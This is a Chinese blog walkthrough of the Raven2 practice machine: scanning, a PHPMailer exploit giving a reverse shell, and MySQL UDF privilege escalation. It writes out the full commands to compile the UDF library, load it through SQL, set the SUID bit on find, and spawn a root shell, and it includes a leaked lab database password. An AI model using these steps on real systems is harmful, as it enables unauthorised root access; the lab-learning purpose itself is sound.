【学渗透靶机——Raven2(mysql-udf提权)】

已于 2023-06-18 15:08:20 修改
阅读量409 收藏 2
点赞数
分类专栏: 靶机学习 web渗透 文章标签: mysql linux web安全 安全
于 2023-06-17 18:32:47 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jieli0901227/article/details/131208160
版权

Raven2靶机

信息收集

主机信息收集

主机ip

map -sn  192.168.241.0/24

在这里插入图片描述

主机开放端口

nmap --min-rate 10000 -p- 192.168.241.169

在这里插入图片描述

主机开放端口服务详细版本

nmap -sT -sV -O -p22,80,111,39169 192.168.241.169

在这里插入图片描述

nmap漏洞探测

nmap --script=vuln -p22,80,111,39169 192.168.241.169

在这里插入图片描述
nmap漏洞探测没有发现可利用的漏洞信息,只有网站的路径枚举信息,,我们留着,后面查看
有个blog使用wordpress框架

主机开放有22,80,111,39169端口 ,22端口没有收集到账号密码信息,那么暴力ssh 消耗时间成本太大,,优先80端口

web 信息收集

80端口

在这里插入图片描述
浏览完页面没有发现什么, 发现blog 是个wordpress CMS,有个搜索,尝试注入,使用sqlmap 跑了一下,没跑成功;
nmap 漏洞探测有路径枚举出的进行访问

wordpree登录页面 尝试弱口令失败

在这里插入图片描述
查看一下wordpress 的版本,已经限制,不能查看版本

http://192.168.241.169/wp-admin/install.php

/vendor/
在http://192.168.241.169/vendor/目录下;

在这里插入图片描述
查看path文件发现有个绝对路径,记录下:
在这里插入图片描述
VERSION,查看该文件可看到一个版本号:5.2.6,这可能是一个软件版本号

再看 /vendor 目录下,还有几个文件名含有 phpmailer 的文件,如 PHPMailerAutoload.php ,可确定 5.2.6 是 PHPMailer 的版本号。
于是使用 searchsploit 在 exploit-db 中搜索 PHPMailer 相关的 exp。这里我们使用40974

在这里插入图片描述
下载后修改:

a.顶部加上# -*- coding: utf-8 -*-声明,否则注释里一大堆非ASCII字符会报错。
b.修改target为靶机IP地址,利用文件为contact.php。
c.修改后门文件路径名称。也不知道为什么,用默认的backdoor.php总是利用不成功,把payload改成shell.php最终利用成功。
d. 修改反弹shell的地址为nc监听服务器的ip(KALI主机IP)和端口。
e、使用python3 运行脚本

在这里插入图片描述
kali设置监听端口,靶机访问shell 文件.

http://192.168.241.169/shell.php

获取系统初始立足点

获取良好shell交互性

python -c 'import pty;pty.spawn("/bin/bash");'

sudo -l

需要密码,这里我们没有,略过

查看计划任务

在这里插入图片描述
发现计划任务不可利用

查看密码文件的权限及账号信息

在这里插入图片描述
/etc/passwd 对于当前用户只有read 权限,那我们就查看一下账户信息

michael:x:1000:1000:michael,,,:/home/michael:/bin/bash
steven:x:1001:1001::/home/steven:/bin/sh

这两个账号家目录下没有发现什么有用信息

查找当前用户能够执行的s位文件

find / -perm -u=s -type f 2>/dev/null

s位文件中也没有发现可以利用的信息

查看服务

在这里插入图片描述
发现系统启用了22(ssh)111 (rpcbind),3306(mysql) 等服务。既然有数据库,还有之前有个wordpress 的blog ,那么查找一下数据库配置文件,

在这里插入图片描述
嘿嘿。。。 ssh端口也开放 我们先尝试 只用这个密码和之前的两个账号和root进行ssh爆破
在这里插入图片描述

失败告终,我们现在有数据库的root 的密码,那么我们尝试mysql udf 提权呢

提权

mysql udf 提权信息收集

(1)mysql 登录账号及密码:
root R@v3nSecurity
(2)查看secure_file_priv值是否为空

show variables like '%secure_file_priv%';

在这里插入图片描述

(3)查看数据库插件路径

show variables like '%plugin%';

在这里插入图片描述
(4)查看数据库版本
在这里插入图片描述

mysql udf 提权利用文件exp 准备

(1)使用searchsploit 查找 mysql udf exp
在这里插入图片描述
(2)这里我们使用1518.c 上传靶机上tmp 目录并编译生成共享库文件1518.so

gcc -g -c 1518.c -fPIC 
gcc -g -shared -Wl,-soname,1518.so -o 1518.so 1518.o -lc

在这里插入图片描述

(3) 靶机登录数据库操作:

create table fo(line blob);
insert into fo values(load_file('/tmp/1518.so'));
select * from fo into dumpfile '/usr/lib/mysql/plugin/1518.so';
create function do_system returns integer soname '1518.so';
select * from mysql.func;
select do_system('chmod u+s /usr/bin/find');

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

提权操作

cd /tmp
touch foo
find foo -exec "/bin/sh" \;

在这里插入图片描述

懒惰的老鼠
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Raven2靶机练习
SYJ_361的博客
03-27 1247
本文是对Raven2靶机的练习,通过phpmailer**CVE-2016-10033远程代码执行漏洞利用**进行反弹shell,通过控制mysql,对靶机权限进行提权,最后得到靶机里面的flag文件
Raven2--靶机实操详解
qq_61802750的博客
10-14 591
​ 进入wordpress目录,有对应的配置文件wp-config.php,我们打开可以看到数据库密码。这时,服务名、版本号都有了,我们可以进行漏洞利用了。​ 既然我们找到mysql版本,我们就可以考虑使用mysql UDF 提权。​ 访问之后,会在后台生成shell文件,我们访问shell.php文件。​ 可以看到,靶机开放了22、80、111端口,我们优先访问80端口。​ 我们再次用python搭建简单的服务器,把文件下载到靶机里面。​ 找到靶机的ip之后,我们使用nmap扫描靶机的端口。
Raven2渗透测试
weixin_56537388的博客
06-13 268
查看wp-config.php文件,发现什么都没有,打开wp-login.php,发现url由我们输入的ip地址变成了raven.local我们需要做的是配置电脑的hosts文件使域名解析到我们的kali主机ip地址。靶机下载地址:链接:https://pan.baidu.com/s/1z2uHZHtn4FROnf_av-2voA。发现目录主要由三部分构成:manual,wordpress,vendor,分别进行访问。可以看到,除了默认的1,2,254,那么192.168.182.132就是目标ip。
掠夺者2Raven2怎么下载 raven2游戏一键下载教程
最新发布
tjy888999的博客
04-24 442
同样在奇游中启用对《掠夺者2:Raven 2》的优化。在奇游中启用对《掠夺者2:Raven 2》的优化。点击游戏详细页面,你将看到一键下载的按钮,点击即可开始下载。下载完成后你就可以在游戏启动器中勾选同意服务协议,然后点击【PC版本预约注册】按钮进行预约注册了。备受瞩目的《掠夺者2:Raven 2》终于要来了。只需在奇游上查看《掠夺者2:Raven 2》并启用优化,即可确保游戏过程中网络连接稳定,告别卡顿和掉线。希望以上教程能够帮助到各位玩家,顺利下载并预约注册《掠夺者2:Raven 2》。
raven2
学习!冲冲冲!
06-12 697
raven2
raven2靶机渗透
my的博客
10-16 198
kaliraven靶机:链接:https://download.vulnhub.com/raven/Raven2.ova。
crasher.tar(DC3靶机所需提权exp-2)
02-20
DC3靶机所需提权exp
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
3-Raven2百个靶机渗透(精写-思路为主)
bmxch的博客
05-08 824
思路清晰先说步骤:1.信息收集,收集到应有的靶机可利用端口。2.用收集到的信息尝试爆破ssh,如果信息足够可用拿到普通用户,最好能一次拿到root3.根据系统版本搜索exp(常规提权),拿到root的shell4.对mysql udf渗透提权,思路为主。以上就是对这个靶机渗透总结了,这里用了mysql udf提权,这个方法现在已经不常用了5.1以后的版本基本无法使用,但是思路是永不过期的,希望大家能好好习思路,而不是花里胡哨的漏洞偏门。
MySQL_UDF提权实验
多喝i热水的博客
11-13 4099
目录 0.环境下载: 1.扫描存活主机 2.目录猜解 3.反弹SHELL 0.环境下载: https://www.vulnhub.com/entry/raven-2,269/ 1.扫描存活主机 nmap -sn 192.168.217.0/24 2.目录猜解 dirb http://192.168.217.141/ http://192.168.217.141/vender 同时目录下还存在一个PHPMailerAutoload.php的文件,配合起来看应该是使用了5.2.16版本的
全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(二)raven1
hyjcking的博客
11-22 1267
接下来使用kali的dirb爆破目录,发现了wordpress目录,说明网站使用了wordpress建站,所以我们一会可以使用wordpress的克星wpscan来扫描。扫描到两个用户名,steven和michael,接下来我们使用hydra对michael用户的ssh密码进行爆破,这里我们使用rockyou.txt字典。尝试了一下sudo提权,发现需要密码,切换目录并查看,命令:cd /var/www/html/wordpress。嘿嘿 提权成功,然后找到flag2.txt,成功拿下这台靶机
kali渗透综合靶机(十)--Raven靶机
W小哥
03-28 2020
一、靶机下载 下载链接:https://download.vulnhub.com/raven/Raven.ova 二、Raven靶机搭建 将下载好的靶机环境,用VMware导入即可使用,文件->打开 导入到合适位置即可,默认是C盘,成功导入虚拟机之后,打开即可 三、攻击过程 kali IP:192.168.212.129 靶机IP:192.168.212.4 1、主机发现 nmap ...
raven2靶机-udf提权
CTF小杂鱼的专栏
08-18 1017
较早的一台靶机,练习udf提权挺不错的。 考点:CVE 2016-10033、Mysql-udf提权 1、靶机导入虚拟机并开机,确定网络是nat模式,所在网络C段为192.168.43.1/24 2、C段探测寻找靶机入口点: nmap -T4 -n -v 192.168.43.1/24 -sn 得到靶机IP:192.168.43.146 3、探测靶机开放服务 nmap -T4 -n -v 192.168.43.146 4、打开http://192.168.43.1...
【SQL注入】UDF提权命令执行
孤桜懶契
08-15 3876
一、什么是udf udf 全称为:user defined function,意为用户自定义函数;用户可以添加自定义的新函数到Mysql中,以达到功能的扩充,调用方式与一般系统自带的函数相同,例如 contact(),user(),version()等函数。 udf 文件后缀一般为 dll,由C、C++编写 二、udf渗透中的作用 在一般渗透过程中,拿下一台windows服务器的webshell时,由于webshell权限较低,有些操作无法进行,而此时本地恰好存在mysql数据库,那么udf可能就派上用场
web安全mysql提权总结篇
Candour_0的博客
01-15 375
web安全mysql提权总结篇
【VulnHub】Raven: 2靶机渗透测试
大方子
06-28 4024
总结和思考: 使用netdiscover探测内网存活主机 PHPMailer的漏洞反弹得到shell Python版的EXP修改 查看wordpress的wp-config.php配置文件得到数据库账号密码 MySQL版本 <= 7.14 5.6.32 5.5.51 可以利用UDF提权 KALI对EXP的编译 给程序chmod u+s 增加suid权限,可以以root权限运...
mysql-udf-http
06-11
mysql-udf-http是MySQL的一个插件,可以通过该插件在MySQL中实现HTTP请求。使用mysql-udf-http插件,可以在MySQL中通过HTTP协议获取远程数据,或者将数据发送到远程服务器。 mysql-udf-http插件可以通过MySQL的用户定义函数(User-defined Function,UDF)实现。UDF是一种自定义的函数,可以根据需要编写自己的函数,并将其集成到MySQL中。mysql-udf-http插件提供了一个名为lib_mysqludf_http的UDF,可以通过该函数实现HTTP请求。 使用mysql-udf-http插件,可以在MySQL中执行以下操作: 1. 获取远程数据。可以通过HTTP协议请求远程服务器,获取远程数据,并将数据保存到MySQL中。 2. 发送数据到远程服务器。可以通过HTTP协议将数据发送到远程服务器,并获取服务器的响应。 3. 实现与远程服务的交互。可以通过mysql-udf-http插件与远程服务进行交互,例如调用REST API等。 需要注意的是,使用mysql-udf-http插件可能会对MySQL安全性产生影响,因此在使用前需要评估风险,并采取相应的安全措施。同时,mysql-udf-http插件需要在MySQL中安装和配置,需要一定的技术能力。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值